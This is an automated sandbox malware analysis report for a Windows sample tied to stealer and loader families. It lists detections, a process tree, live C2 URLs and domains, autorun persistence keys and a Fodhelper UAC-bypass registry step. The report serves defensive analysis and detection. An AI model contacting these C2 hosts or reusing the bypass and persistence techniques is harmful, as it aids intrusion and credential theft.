Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S23UhdW5DH.exe

Overview

General Information

Sample name:S23UhdW5DH.exe
renamed because original name is a hash value
Original sample name:9df4007d210772fc229eefea7f15c06d.exe
Analysis ID:1386724
MD5:9df4007d210772fc229eefea7f15c06d
SHA1:021ae6bce912d6a3fe9435a307eac6b85eb18865
SHA256:1a04a01ff9144cee276994c8a5beda3ebacbc4846afb13b8a700212c1092ef14
Tags:exeSocks5Systemz
Infos:

Detection

LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
PE file has a writeable .text section
Performs DNS queries to domains with low reputation
Probes for web service weaknesses (weak passwords or vulnerabilities)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to a URL shortener service
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses FTP
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • S23UhdW5DH.exe (PID: 5552 cmdline: C:\Users\user\Desktop\S23UhdW5DH.exe MD5: 9DF4007D210772FC229EEFEA7F15C06D)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • FE8B.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\FE8B.exe MD5: E88E0FE2BB602D639E5658C42F34AF2F)
        • WerFault.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 572.exe (PID: 3576 cmdline: C:\Users\user\AppData\Local\Temp\572.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • 572.exe (PID: 524 cmdline: C:\Users\user\AppData\Local\Temp\572.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • 93B.exe (PID: 7144 cmdline: C:\Users\user\AppData\Local\Temp\93B.exe MD5: 1996A23C7C764A77CCACF5808FEC23B0)
      • regsvr32.exe (PID: 5960 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 1908 cmdline: /s C:\Users\user\AppData\Local\Temp\1199.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • 1EB9.exe (PID: 1008 cmdline: C:\Users\user\AppData\Local\Temp\1EB9.exe MD5: 82BEB2A060E63C9C9A26663D0103FAE6)
        • 1EB9.tmp (PID: 4200 cmdline: "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" MD5: B0292A40F16BC3D5A1FE839FAC1C825A)
          • 1EB9.exe (PID: 4044 cmdline: "C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E MD5: 82BEB2A060E63C9C9A26663D0103FAE6)
            • 1EB9.tmp (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E MD5: B0292A40F16BC3D5A1FE839FAC1C825A)
              • vbsmartcardviewer.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i MD5: 29DEB5EE2C07F1E8660E10AB6E4A0966)
              • vbsmartcardviewer.exe (PID: 4328 cmdline: "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s MD5: 29DEB5EE2C07F1E8660E10AB6E4A0966)
      • 356F.exe (PID: 5016 cmdline: C:\Users\user\AppData\Local\Temp\356F.exe MD5: CEAE65EE17FF158877706EDFE2171501)
        • InstallSetup4.exe (PID: 4632 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
          • BroomSetup.exe (PID: 5724 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
            • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 416 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • nsx5151.tmp (PID: 5176 cmdline: C:\Users\user\AppData\Local\Temp\nsx5151.tmp MD5: 7C0B88535C506FC8BEC1510F08F3329C)
        • FourthX.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
          • powershell.exe (PID: 1656 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • FourthX.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • csrss.exe (PID: 6648 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • csrss.exe (PID: 3132 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
  • rghwvve (PID: 1136 cmdline: C:\Users\user\AppData\Roaming\rghwvve MD5: 9DF4007D210772FC229EEFEA7F15C06D)
  • 93B.exe (PID: 6832 cmdline: "C:\Users\user\AppData\Local\Temp\93B.exe" MD5: 1996A23C7C764A77CCACF5808FEC23B0)
  • svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3728 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2156 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\BroomSetup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\Temp\356F.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
      • 0x8ad454:$s1: Runner
      • 0x8ad5b9:$s3: RunOnStartup
      • 0x8ad468:$a1: Antis
      • 0x8ad495:$a2: antiVM
      • 0x8ad49c:$a3: antiSandbox
      • 0x8ad4a8:$a4: antiDebug
      • 0x8ad4b2:$a5: antiEmulator
      • 0x8ad4bf:$a6: enablePersistence
      • 0x8ad4d1:$a7: enableFakeError
      • 0x8ad5e2:$a8: DetectVirtualMachine
      • 0x8ad607:$a9: DetectSandboxie
      • 0x8ad632:$a10: DetectDebugger
      • 0x8ad641:$a11: CheckEmulator

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x70ea:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x2a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.93B.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            16.2.93B.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x10170:$s2: Elevation:Administrator!new:
            10.2.93B.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              10.2.93B.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x10170:$s2: Elevation:Administrator!new:
              35.0.BroomSetup.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 3 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Files With System Process Name In Unsuspected Locations
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetFilename: C:\ProgramData\Drivers\csrss.exe
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ParentImage: C:\ProgramData\Drivers\csrss.exe, ParentProcessId: 6648, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 3132, ProcessName: csrss.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 6036, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 1656, ProcessName: powershell.exe
                Sigma detected: System File Execution Location Anomaly
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6648, ProcessName: csrss.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSRSS
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rghwvve, CommandLine: C:\Users\user\AppData\Roaming\rghwvve, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rghwvve, NewProcessName: C:\Users\user\AppData\Roaming\rghwvve, OriginalFileName: C:\Users\user\AppData\Roaming\rghwvve, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\rghwvve, ProcessId: 1136, ProcessName: rghwvve
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.17.62.50, DestinationIsIpv6: false, DestinationPort: 465, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\572.exe, Initiated: true, ProcessId: 524, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 52506
                Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rghwvve, CommandLine: C:\Users\user\AppData\Roaming\rghwvve, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rghwvve, NewProcessName: C:\Users\user\AppData\Roaming\rghwvve, OriginalFileName: C:\Users\user\AppData\Roaming\rghwvve, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\rghwvve, ProcessId: 1136, ProcessName: rghwvve
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 6036, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 1656, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1432, ProcessName: svchost.exe

                Snort Signatures

                Timestamp:192.168.2.691.215.85.12049706802039103 02/05/24-12:12:18.420413
                SID:2039103
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: S23UhdW5DH.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://secretionsuitcasenioise.shop/apibAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                Multi AV Scanner detection for domain / URL
                Source: selebration17io.ioVirustotal: Detection: 12%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeReversingLabs: Detection: 51%
                Source: C:\Users\user\AppData\Local\Temp\356F.exeReversingLabs: Detection: 91%
                Source: C:\Users\user\AppData\Local\Temp\93B.exeReversingLabs: Detection: 86%
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 21%
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\rghwvveReversingLabs: Detection: 44%
                Multi AV Scanner detection for submitted file
                Source: S23UhdW5DH.exeReversingLabs: Detection: 44%
                Source: S23UhdW5DH.exeVirustotal: Detection: 52%Perma Link
                Yara detected Glupteba
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
                Source: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: S23UhdW5DH.exeJoe Sandbox ML: detected
                Source: 572.exe, 00000009.00000003.2642497062.00000000046D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_8e75bb10-7

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

                Privilege Escalation

                barindex
                UAC bypass detected (Fodhelper)
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: DelegateExecute
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

                Bitcoin Miner

                barindex
                Yara detected Glupteba
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpUnpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack
                Source: S23UhdW5DH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.152.52:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.152:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.120:443 -> 192.168.2.6:49713 version: TLS 1.2
